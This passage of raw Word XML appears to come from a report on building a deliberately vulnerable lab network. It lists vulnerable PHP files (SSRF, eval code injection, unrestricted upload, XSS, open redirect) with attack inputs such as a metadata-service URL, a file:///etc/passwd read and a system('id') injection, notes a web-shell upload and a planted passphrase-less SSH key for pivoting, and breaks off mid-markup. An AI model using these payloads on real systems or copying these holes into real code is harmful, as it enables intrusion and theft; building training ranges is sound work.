    </w:p>
    <w:p w14:paraId="1EBB567A" w14:textId="02992AC0" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="003F32CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Internal network scanning (</w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?url=http://10.0.4.141:22</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>), cloud metadata access (</w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://169.254.169.254/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>), and local file reading (</w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="009025BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>file:///etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E972212" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server-Side Template Injection (SSTI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1702DAB1" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>template_renderer.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4477FB28" w14:textId="77777777"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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA1489E" w14:textId="4C1F8B39"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 xml:space="preserve">    if (isset($_GET['name'])) {$name = $_GET['name']; $template = '"Welcome, </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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> '!"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="089BD43E" w14:textId="392E507E"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 xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eval(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"echo $template;"); // Code execution}?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF2D9D" w14:textId="18EAC2BE" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Attack Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: PHP code injection (</w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?name=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>";system</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('id');"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) for immediate command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2FEAB6" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Unrestricted File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C2DDF" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: photo_uploader.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3250376F" w14:textId="77777777"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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F555DD" w14:textId="7BEBBB1B"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 xml:space="preserve">    if (isset($_FILES['photo'])) {$filename = $_FILES['photo</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'name']; // No validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C262AB" w14:textId="7BFE0286"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$destination = __DIR_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> "/uploads/</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$filename; move_uploaded_file($_FILES['photo</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'tmp_name'], $destination</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="734FF3E3" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        echo "&lt;p&gt;Access it at: &lt;a href='uploads/$filename'&gt;uploads/$filename&lt;/a&gt;&lt;/p&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1DFA389A" w14:textId="77777777" w:rsidR="00EA3D53" w:rsidRDefault="000F00D6" w:rsidP="00EA3D53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    }?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320D1CE5" w14:textId="5DCD09B4" w:rsidR="000F00D6" w:rsidRPr="00EA3D53" w:rsidRDefault="000F00D6" w:rsidP="00EA3D53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Web shell upload (e.g., shell.php) for persistent backdoor access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78061C3F" w14:textId="01ED702E" w:rsidR="005B5AD9" w:rsidRPr="00D77DFE" w:rsidRDefault="00BF6F61" w:rsidP="00BF6F61">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="paragraph96"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The tester utilized a ready-to-use PHP reverse shell obtained from Pentestmonkey to exploit the vulnerability in the code above </w:t>
      </w:r>
      <w:hyperlink w:anchor="resource96" w:history="1">
        <w:r w:rsidR="005B5AD9" w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>[</w:t>
        </w:r>
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>35]</w:t>
        </w:r>
        <w:bookmarkEnd w:id="80"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E29D12" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) and Open Redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4509DE97" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="001E5C24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>main.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9BF9E6" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="001E5C24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CEC065" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="001E5C24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    // XSS vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1263504A" w14:textId="4CF4670A" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="001E5C24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (isset($_GET['query'])) </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&lt;p&gt;You searched for: &lt;strong&gt;</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$_GET['query'</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"&lt;/strong&gt;&lt;/p&gt;";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070BEE71" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="001E5C24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Open redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28199BAA" w14:textId="515AE581" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="001E5C24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (isset($_GET['next'])) {("Location: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> $_GET['next']);}?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F828F77" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="001E5C24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Vectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Stored/reflected XSS for credential theft and phishing via open redirects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2DA4D4" w14:textId="28CA477D" w:rsidR="00934C54" w:rsidRPr="00EA3D53" w:rsidRDefault="00F8700B" w:rsidP="00F8700B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3D53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>SSH Key Configuration for Network Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58999184" w14:textId="77777777" w:rsidR="00F8700B" w:rsidRPr="00D77DFE" w:rsidRDefault="00F8700B" w:rsidP="00F8700B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>To enable pivoting from ServerMeta (Subnet 3) to the isolated SecretMachine (Subnet 4), an SSH key pair was intentionally misconfigured. This simulates scenarios where administrators leave authentication credentials in accessible locations, creating unintended access paths across network boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23419D57" w14:textId="77777777" w:rsidR="00F8700B" w:rsidRPr="00D77DFE" w:rsidRDefault="00F8700B" w:rsidP="00F8700B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>On SecretMachine (10.0.4.141), an SSH key pair was generated and the public key added to authorized_keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A84D26" w14:textId="5DB49A43" w:rsidR="00F8700B" w:rsidRPr="009025BF" w:rsidRDefault="00F8700B" w:rsidP="00F8700B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ssh-keygen -t rsa -b 2048 -f /home/secretuser/.ssh/key_Zain.pem -N ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A497D3" w14:textId="1B22DB15" w:rsidR="00F8700B" w:rsidRPr="00D77DFE" w:rsidRDefault="00F8700B" w:rsidP="00F8700B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Then add public key to authorized_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>keys :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29602A60" w14:textId="19615E82" w:rsidR="00F8700B" w:rsidRPr="009025BF" w:rsidRDefault="00F8700B" w:rsidP="00F8700B">
      <w:pPr>
        <w:rPr>
